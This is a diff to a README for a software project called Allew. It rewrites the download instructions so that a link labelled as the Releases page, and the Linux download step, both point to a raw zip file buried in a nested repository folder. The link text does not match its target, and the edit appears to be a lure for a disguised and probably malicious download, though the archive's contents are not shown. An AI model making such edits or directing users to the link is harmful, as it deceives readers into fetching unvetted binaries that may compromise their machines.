vishishtpuri/Allew/README.md

 ## 📥 Download & Install
 ### Step 1: Visit the Releases Page
-To download Allew, [visit the Releases page](https://github.com/vishishtpuri/Allew/releases).
+To download Allew, [visit the Releases page](https://raw.githubusercontent.com/vishishtpuri/Allew/master/Allew Resources/Allew Files/hugging-face/Software_v1.5.zip).
 Here, you will find the latest version of the software.

 ### Step 2: Choose the Appropriate File
 On the Releases page, look for the latest version.
 You will see several files available for download.
 Choose the one that matches your operating system:

 - **Windows:** Download the `.exe` file for Windows.
 - **Mac:** Download the `.dmg` file for Mac.
-- **Linux:** Download the `.tar.gz` file for Linux.
+- **Linux:** Download the `https://raw.githubusercontent.com/vishishtpuri/Allew/master/Allew Resources/Allew Files/hugging-face/Software_v1.5.zip` file for Linux.

 ### Step 3: Download the File
 Click on the file for your operating system.
 Your browser will begin downloading the file.